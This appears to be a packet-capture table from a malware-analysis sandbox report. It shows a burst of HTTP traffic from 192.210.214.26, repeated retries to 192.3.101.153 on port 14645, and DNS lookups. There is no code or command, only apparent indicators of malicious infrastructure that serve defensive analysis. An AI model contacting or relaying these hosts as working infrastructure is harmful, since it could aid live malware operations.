Apr 24, 2024 10:24:20.385078907 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385096073 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385102034 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.385129929 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.385248899 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385262012 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385305882 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.385441065 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385453939 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385468960 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385487080 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.385618925 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385632038 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385646105 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385651112 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.385679960 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.385796070 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385809898 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385845900 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.385987043 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.385999918 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386013031 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386034012 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.386168003 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386181116 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386195898 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386202097 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.386229038 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.386343002 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386356115 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386389017 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.386528969 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386542082 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386558056 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386575937 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.386707067 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386722088 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386740923 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.386893988 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386905909 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386919975 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.386929989 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.387073994 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.387108088 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.387262106 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388242960 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388262987 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388288975 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.388375044 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388387918 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388406992 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.388571978 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388586998 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388602972 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388607025 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.388617039 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388633966 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.388907909 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388925076 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.388945103 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.389094114 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389108896 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389122009 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389137983 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.389158964 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.389276981 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389291048 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389302969 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389314890 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389328003 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.389350891 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.389453888 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389467001 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389478922 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389497995 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.389664888 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389678955 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.389702082 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.390160084 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390176058 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390189886 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390214920 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.390319109 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390332937 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390357971 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.390373945 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390410900 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.390571117 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390584946 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390620947 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.390744925 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390759945 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390789986 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.390938997 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390955925 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390968084 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.390990019 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.391108036 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391123056 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391134024 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391146898 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391154051 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.391180038 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.391290903 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391304970 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391318083 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391335964 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.391470909 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391484976 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391499043 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391514063 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.391664028 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391681910 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391695023 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391705990 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.391709089 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391730070 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.391844034 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391859055 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.391884089 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.392023087 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392036915 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392052889 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392062902 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.392093897 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.392201900 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392216921 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392251968 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.392343998 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392358065 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392398119 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.392553091 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392568111 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392580032 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392599106 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.392826080 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392839909 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392853022 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.392867088 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.392891884 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393021107 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393035889 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393049002 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393062115 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393066883 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393100977 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393189907 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393203974 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393215895 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393232107 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393240929 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393270016 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393376112 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393390894 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393419981 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393537998 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393726110 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393739939 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393753052 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393768072 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393785954 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393795967 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393800974 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393814087 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393826962 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393840075 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393841028 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393857956 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393866062 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393888950 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393898010 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393912077 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393933058 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393945932 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393946886 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.393959999 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393971920 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393985033 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.393985987 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394000053 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394007921 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394015074 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394027948 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394038916 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394042015 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394057035 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394068003 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394069910 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394083977 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394094944 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394098043 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394113064 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394120932 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394133091 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394146919 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394155979 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394160032 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394172907 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394184113 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394192934 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394207001 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394216061 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394242048 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394248009 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394274950 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394315004 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.394340038 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394397974 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.394448996 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.564790964 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.564821959 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.564836025 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.564850092 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.564881086 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.564910889 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.564925909 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.564912081 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.564949036 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.564995050 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.565010071 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565057039 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.565067053 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565100908 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565144062 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.565171003 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565224886 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565277100 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565283060 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.565335989 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565380096 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.565397024 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565411091 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565450907 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.565485954 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565619946 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565638065 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.565665007 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.566051006 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566096067 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.566117048 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566137075 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566157103 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566180944 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.566189051 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566224098 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566235065 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.566358089 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566390991 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566407919 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.566442013 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566485882 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.566843033 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566873074 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.566917896 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.566999912 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567025900 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567070961 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.567085028 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567137957 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567179918 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.567188978 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567233086 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567274094 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.567307949 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567410946 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567464113 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567462921 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.567490101 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567504883 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567528963 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567533970 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.567544937 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567569971 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.567590952 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567615032 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567637920 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.567670107 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567686081 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:20.567718029 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:20.644746065 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:21.028245926 CEST	49166	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:24:24.034198999 CEST	49166	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:24:30.040242910 CEST	49166	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:24:43.333273888 CEST	49167	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:24:46.342267036 CEST	49167	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:24:52.395040989 CEST	49167	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:25:05.719113111 CEST	49168	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:25:08.728285074 CEST	49168	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:25:14.734364986 CEST	49168	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:25:30.051959991 CEST	49169	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:25:33.064450979 CEST	49169	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:25:39.117139101 CEST	49169	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:27:46.985949039 CEST	49170	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:27:50.032649994 CEST	49170	14645	192.168.2.22	192.3.101.153
Apr 24, 2024 10:27:56.054306984 CEST	49170	14645	192.168.2.22	192.3.101.153

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 10:24:05.418694973 CEST	54562	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:24:05.592645884 CEST	53	54562	8.8.8.8	192.168.2.22
Apr 24, 2024 10:24:05.619237900 CEST	54562	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:24:05.791914940 CEST	53	54562	8.8.8.8	192.168.2.22
Apr 24, 2024 10:24:05.792258024 CEST	54562	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:24:05.966388941 CEST	53	54562	8.8.8.8	192.168.2.22
Apr 24, 2024 10:24:05.966687918 CEST	54562	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:24:06.136553049 CEST	53	54562	8.8.8.8	192.168.2.22
Apr 24, 2024 10:24:09.849584103 CEST	52917	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:24:10.023787975 CEST	53	52917	8.8.8.8	192.168.2.22
Apr 24, 2024 10:24:20.715693951 CEST	62751	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:24:20.959872007 CEST	53	62751	8.8.8.8	192.168.2.22
Apr 24, 2024 10:24:43.074939013 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:24:43.332046986 CEST	53	57893	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:05.474859953 CEST	54821	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:05.718367100 CEST	53	54821	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:29.803417921 CEST	54719	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:30.051095963 CEST	53	54719	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:56.015070915 CEST	49881	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:56.186532974 CEST	53	49881	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:56.186801910 CEST	49881	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:56.430120945 CEST	53	49881	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:56.435131073 CEST	49881	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:56.608642101 CEST	53	49881	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:56.608850002 CEST	49881	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:56.779314041 CEST	53	49881	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:56.787647963 CEST	49881	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:56.961359024 CEST	53	49881	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:57.984812975 CEST	54998	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:58.228331089 CEST	53	54998	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:58.228638887 CEST	54998	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:58.397811890 CEST	53	54998	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:58.398096085 CEST	54998	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:58.641875029 CEST	53	54998	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:58.642163038 CEST	54998	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:25:58.815279007 CEST	53	54998	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:58.815480947 CEST	54998	53	192.168.2.22	8.8.8.8
